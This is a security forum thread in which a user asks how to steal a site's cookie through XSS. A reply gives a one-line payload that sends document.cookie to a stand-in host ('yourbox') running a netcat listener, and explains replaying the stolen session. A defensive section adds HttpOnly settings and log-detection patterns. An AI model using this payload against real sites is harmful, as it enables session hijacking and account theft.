XSS snatching cookie without domain

Viewing 4 reply threads
  • Author
    Posts
    • #6709
      bigapple
      Participant

Okay, I’m new to this site so I’m hoping my question doesn’t come off as malicious. This is for school, so I’m not trying to do anything evil. Anyway, I was wondering if it’s possible to snatch a cookie using XSS and deliver it to an attacker without sending it to an attacker-controlled domain. Like if an attacker didn’t own a domain, or if the domain was blocked, is there any other method or trick that can be used to receive the cookie? I can code in JavaScript relatively well, so you can talk about JavaScript functions, methods etc. And that’s encouraged because I’m interested in the coding perspective, so please give me your ideas. Thanks.  ;D

    • #41704
      cd1zz
      Participant

Three assumptions: 1) the site uses session cookies, 2) there is an XSS vulnerability in the application and 3) you can SE someone into opening your link or get it to them somehow.

With that said, yes. You can basically take the cookie from the site using JavaScript and send it to a listener somewhere else. A simple remote netcat listener would do to capture your stolen cookie. With the data posted to your screen you’d just locate the cookie and copy it. Then, use a proxy to intercept your own web communications to inject your stolen cookie and whatever else you need. Does that answer your question?

    • #41705
      bigapple
      Participant

I thought JavaScript code was limited to client-side browser stuff. Can JavaScript even make a TCP connection? If it can, then yes, that would answer my question very nicely. But I was thinking more along the lines of something like emailing the contents of the cookie, or some other web-related method of delivering it, but that will work well. Thanks.

    • #41706
      cd1zz
      Participant

You could use something like document.location.replace("http://yourbox/"+document.cookie+"pagelocation:"+document.location)

which would connect to "yourbox" where your netcat listener is and send you the cookie with the URL query string...

      MaXe has a nice example here, not the same thing but it might get your wheels turning:  http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/
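For the defensive side of what cd1zz describes above, here is an added example (not code from the thread or from any poster) showing the two things a site owner would do about it: mark the session cookie HttpOnly so document.cookie never exposes it to an injected script, and scan access-log lines for requests whose path carries cookie-shaped data or the "pagelocation:" marker used in the post. The log lines, the cookie names matched and the combined-log format assumed by the parser are all constructed for this example.

```javascript
// Added example, not from the thread. Two defender-side pieces:
//  1. a Set-Cookie value with HttpOnly, so the session cookie is not readable
//     via document.cookie and the injected script above has nothing to send;
//  2. a small access-log scanner that flags requests whose path looks like a
//     cookie string being smuggled out in the URL, as in the post.

function sessionCookieHeader(name, value) {
  // HttpOnly keeps the cookie out of document.cookie; Secure limits it to
  // HTTPS; SameSite=Lax stops most cross-site sending.
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Common session-cookie names (assumed list, extend for your application),
// followed by "=" and at least 8 token characters.
const SESSION_COOKIE = /(?:^|[^A-Za-z0-9_])(?:PHPSESSID|JSESSIONID|ASP\.NET_SessionId|sessionid|session|sid)=[A-Za-z0-9._-]{8,}/i;
// Literal marker from the exfiltration snippet quoted in the post.
const PAGE_MARKER = /pagelocation:/i;

function parseAccessLine(line) {
  // Minimal parser for a combined-format access log line (constructed format).
  const m = line.match(/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"$/);
  if (!m) return null;
  return { client: m[1], when: m[2], method: m[3], path: m[4], status: m[5], referer: m[6] };
}

function classifyRequest(line) {
  const rec = parseAccessLine(line);
  if (!rec) return { flagged: false, reason: "unparsed" };
  let decoded = rec.path;
  try { decoded = decodeURIComponent(rec.path); } catch (_) { /* malformed escape: keep raw path */ }
  const reasons = [];
  if (SESSION_COOKIE.test(decoded)) reasons.push("session cookie in request path");
  if (PAGE_MARKER.test(decoded)) reasons.push("pagelocation marker in request path");
  if (reasons.length > 0 && rec.referer !== "-") {
    // A referer on another site is consistent with a redirect injected there.
    reasons.push(`referred from ${rec.referer}`);
  }
  return { flagged: reasons.length > 0, reason: reasons.join("; "), ...rec };
}

function scanLog(lines) {
  // Returns only the flagged records, in log order.
  return lines.map(classifyRequest).filter(r => r.flagged);
}

// Constructed sample log: the first line is what the listener host would see
// after the document.location.replace() call from the post; the others are benign.
const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Oct/2020:13:55:36 +0000] "GET /PHPSESSID=abc123def456;%20theme=darkpagelocation:http://shop.example/account HTTP/1.1" 404 0 "http://shop.example/search?q=x" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Oct/2020:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
  '198.51.100.3 - - [10/Oct/2020:13:56:01 +0000] "GET /search?q=session&page=2 HTTP/1.1" 200 888 "-" "Mozilla/5.0"',
];

for (const hit of scanLog(SAMPLE_LOG)) {
  console.log(`${hit.when} ${hit.client} ${hit.method} ${hit.path} -> ${hit.reason}`);
}
```

The scanner is meant for the logs of the receiving side (an outbound proxy or a web server that is not yours but ends up in your logs), where the whole cookie string shows up in the request path; on the vulnerable site itself the more useful control is the HttpOnly flag, since without it the injected script simply has nothing to send.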

    • #41707
      bigapple
      Participant

      Okay, thanks. That answers my question nicely  ;D
